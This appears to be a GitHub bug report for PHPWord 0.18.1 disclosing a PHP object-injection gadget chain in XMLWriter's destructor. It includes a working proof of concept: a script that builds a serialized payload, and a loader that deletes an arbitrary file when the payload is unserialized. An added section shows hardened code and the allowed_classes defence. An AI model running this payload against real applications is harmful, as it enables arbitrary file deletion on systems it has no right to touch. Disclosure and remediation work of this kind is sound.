
There is a simple POP chain that can cause arbitrary file deletion; this POP chain can be leveraged in the exploitation of a POI vulnerability #2081

@nth347

Description


Describe the Bug

The XMLWriter class has a __destruct() method, and the unlink() function is called there with one of the object's properties as its argument (see the picture below). Because all the properties of an object can be controlled by an attacker via a POI vulnerability, this simple POP chain consists of only one method call, but it can cause arbitrary file deletion!

[image: XMLWriter::__destruct() source, referenced above]

Steps to Reproduce

Script for generating serialized payload, generate.php:

<?php
// Same namespace and class name as PhpOffice\PhpWord\Shared\XMLWriter,
// so serialize() emits a string naming the real class.
namespace PhpOffice\PhpWord\Shared;

class XMLWriter {
    // The property that the real __destruct() passes to unlink().
    private $tempFileName = '';

    public function __construct($fileName) {
        $this->tempFileName = $fileName;
    }
}

$xmlWriter = new XMLWriter("/home/nth347/test.txt");
file_put_contents("payload.txt", serialize($xmlWriter));

$ php generate.php

Script for testing the generated payload, test.php:

<?php
require_once "vendor/autoload.php";

unserialize(file_get_contents("payload.txt"));

$ php test.php

Expected Evil Behavior

The /home/nth347/test.txt file will be deleted after executing the test.php script.

Context

  • PHP 7.4.3
  • PHPWord 0.18.1
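For context on how such a destructor gadget is neutralised, here is an added example (not PHPWord's code, and not part of the report above): a minimal writer class whose __destruct() cleans up a temp file, hardened so it refuses to be revived by unserialize(), next to the consumer-side allowed_classes guard. The class, property and function names are assumptions, and the serialized string at the bottom is constructed for the demo.

```php
<?php
// Added illustration, not PhpOffice\PhpWord\Shared\XMLWriter itself.
// Class, property and function names are assumptions.
namespace Example;

final class TempFileWriter
{
    private string $tempFileName;

    public function __construct()
    {
        // The object chooses its own path; it is never taken from outside.
        $this->tempFileName = tempnam(sys_get_temp_dir(), 'xml');
    }

    // Refuse to be rebuilt from serialized data: restoring state from the
    // input is what turns the destructor into a gadget, so fail loudly.
    public function __wakeup(): void
    {
        throw new \LogicException('TempFileWriter must not be unserialized');
    }

    public function __destruct()
    {
        // Defence in depth: only remove a regular file inside the temp dir,
        // never an arbitrary path that ended up in the property.
        $tmpDir = realpath(sys_get_temp_dir());
        $path   = realpath($this->tempFileName);
        if ($tmpDir !== false && $path !== false && is_file($path)
            && strncmp($path, $tmpDir . DIRECTORY_SEPARATOR, strlen($tmpDir) + 1) === 0) {
            unlink($path);
        }
    }
}

// Consumer side, the control that actually matters: with
// allowed_classes => false every object in the input is restored as
// __PHP_Incomplete_Class, so no real class's __destruct() can ever run.
function loadUntrusted(string $blob)
{
    return unserialize($blob, ['allowed_classes' => false]);
}

// Constructed input: a serialized TempFileWriter whose private
// tempFileName points at a path the object never created.
$blob = "O:22:\"Example\\TempFileWriter\":1:{s:36:\"\0Example\\TempFileWriter\0tempFileName\";s:10:\"/some/file\";}";
$obj  = loadUntrusted($blob);
var_dump(get_class($obj));
```

Running it shows the object coming back as __PHP_Incomplete_Class rather than as TempFileWriter, so nothing is unlinked when it is destroyed.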
